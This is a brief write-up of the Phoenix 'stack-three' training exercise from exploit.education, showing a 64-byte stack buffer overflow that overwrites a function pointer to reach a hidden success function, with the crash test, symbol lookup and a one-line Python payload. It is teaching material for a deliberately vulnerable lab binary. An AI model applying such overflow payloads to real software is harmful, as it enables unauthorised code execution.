Write-up for: Stack Three
This is again very similar, but this time we are overwriting a function pointer via stdin.
user@phoenix-amd64:/opt/phoenix/i486$ ./stack-three Welcome to phoenix/stack-three, brought to you by https://exploit.education AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA calling function pointer @ 0x41414141 Segmentation fault
The buffer is again 64 bytes large. Thus we can precisely target the function pointer value.
Where do we want to jump instead? Looking at the symbols we can see a function called
objdump -t stack-three 08048535 g F .text 00000020 complete_level
Since we have no memory protection, let’s just jump there
user@phoenix-amd64:/opt/phoenix/i486$ python -c 'print "A"*64 + "\x08\x04\x85\x35"[::-1]' | ./stack-three Welcome to phoenix/stack-three, brought to you by https://exploit.education calling function pointer @ 0x8048535 Congratulations, you've finished phoenix/stack-three :-) Well done!ongratulations, you've finished phoenix/stack-three :-) Well done!
Don’t forget the little endianness ;)